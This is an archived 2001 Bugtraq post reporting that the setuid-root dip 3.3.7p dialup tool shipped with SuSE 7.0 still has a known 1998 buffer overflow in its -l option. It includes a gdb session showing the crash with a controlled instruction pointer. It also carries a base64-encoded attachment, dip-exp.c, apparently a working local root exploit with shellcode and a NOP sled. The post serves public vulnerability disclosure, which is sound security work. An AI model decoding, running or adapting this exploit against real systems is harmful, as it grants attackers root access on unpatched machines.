[21420] in bugtraq
dip 3.3.7p-overflow
daemon@ATHENA.MIT.EDU (sebi hegi)
Mon Jul 9 20:22:09 2001
From: sebi hegi <hegenbart@aon.at>
To: bugtraq@securityfocus.com
Date: Mon, 9 Jul 2001 20:33:37 +0200
Content-Type: Multipart/Mixed;
boundary="Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD"
MIME-Version: 1.0
Message-Id: <01070920432401.01023@faust>
--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD
Content-Type: text/plain
Content-Transfer-Encoding: 8bit
Hi!
After doing a check on my SuSE linux 7.0 x86 i found something interesting:
hegi@faust:~ > ls -la /usr/sbin/dip
-rwsr-xr-- 1 root dialout 62056 Jul 29 2000 /usr/sbin/dip
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
I considered this as a sort of old version and did some searching and found
something on insecure.org as well as on securityfocus.com.
Description: Standard overflow (in the -l option processing).
Author: Goran Gajic <ggajic@AFRODITA.RCUB.BG.AC.YU>
Compromise: root (local)
Vulnerable Systems: Slackware Linux 3.4, presumably any other system using dip-3.3.7o or earlier suid root.
Date: 5 May 1998
Referring to a bugtraq post from may 5. 1998 I did son research:
root@faust:/home/hegi > gdb /usr/sbin/dip
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you are
welcome to change it and/or distribute copies of it under certain conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB. Type "show warranty" for details.
This GDB was configured as "i386-suse-linux"...(no debugging symbols found)...
(gdb) run -k -l `perl -e 'print "a" x 130 '`
Starting program: /usr/sbin/dip -k -l `perl -e 'print "a" x 130 '`
DIP: Dialup IP Protocol Driver version 3.3.7p-uri (25 Dec 96)
Written by Fred N. van Kempen, MicroWalt Corporation.
DIP: cannot open /var/lock/LCK..aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa: Datei oder Verzeichnis nicht gefunden
Program received signal SIGSEGV, Segmentation fault.
0x61616161 in ?? ()
Looks like this version is still vulnerable although it went public in 1998
referring to securityfocus.com.
Itīs not world executable but still a security risk on SuSE 7.0. And Iīm
wondering why at least SuSE still shippes a product with a known vulnerability.
I was told that Slackware 7.1 shippes the same version as well vulnerable.
The vendor was contacted 3 years ago, still not patched.
( I wouldnīt consider a sprintf so damn hard to patch. )
Have a nice day.
Sebastian Hegenbart
--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD
Content-Type: text/x-c;
name="dip-exp.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="dip-exp.c"
LyogTGludXggeDg2IGRpcCAzLjMuN3AgZXhwbG9pdCBieSBwcjEwbiAqLwoKCiNpbmNsdWRlIDxz
dGRpby5oPgoKI2RlZmluZSBOT1AgMHg5MAoKCi8qdGhhbmtzIHRvIGhhY2suY28uemEqLwpjaGFy
IHNoZWxsY29kZVtdID0KICAgICAgICAgICJceDMxXHhjMFx4MzFceGRiXHgzMVx4YzlceGIwXHg0
Nlx4Y2RceDgwXHhlYlx4MWQiCiAgICAgICAgICAiXHg1ZVx4ODhceDQ2XHgwN1x4ODlceDQ2XHgw
Y1x4ODlceDc2XHgwOFx4ODlceGYzIgogICAgICAgICAgIlx4OGRceDRlXHgwOFx4OGRceDU2XHgw
Y1x4YjBceDBiXHhjZFx4ODBceDMxXHhjMCIKICAgICAgICAgICJceDMxXHhkYlx4NDBceGNkXHg4
MFx4ZThceGRlXHhmZlx4ZmZceGZmL2Jpbi9zaCI7CgoKCnVuc2lnbmVkIGxvbmcgZ2V0X3NwKHZv
aWQpeyBfX2FzbV9fKCJtb3ZsICVlc3AsICVlYXgiKTt9CgptYWluKGludCBhcmdjLCBjaGFyICph
cmd2W10pewoKY2hhciBidWZbMTM2XTsKaW50IGk7CmludCBvZmZzZXQ9MCwqcHRyOwpsb25nIHJl
dDsKCgppZihhcmdjIT0yKXsKcHJpbnRmKCJ1c2FnZTogJXMgb2Zmc2V0XG4iLGFyZ3ZbMF0pOwpl
eGl0KDApO30KCm9mZnNldD1hdG9pKGFyZ3ZbMV0pOwoKcmV0PShnZXRfc3AoKS1vZmZzZXQpOwoK
Zm9yKGk9MTtpPDEzNjtpKz00KXsKKihsb25nICopJmJ1ZltpXT1yZXQ7fQoKcHJpbnRmKCJcbnVz
aW5nOiAweCV4XG5cbiIscmV0KTsKCmZvcihpPTA7aTwoc2l6ZW9mKGJ1Ziktc3RybGVuKHNoZWxs
Y29kZSktNDApO2krKykKYnVmW2ldPU5PUDsKCm1lbWNweShidWYraSxzaGVsbGNvZGUsc3RybGVu
KHNoZWxsY29kZSkpOwoKZXhlY2woIi91c3Ivc2Jpbi9kaXAiLCJkaXAiLCItayIsIi1sIixidWYs
KGNoYXIgKikwKTsKCgp9CgoK
--Boundary-=_nWlrBbmQBhCDarzOwKkYHIDdqSCD--
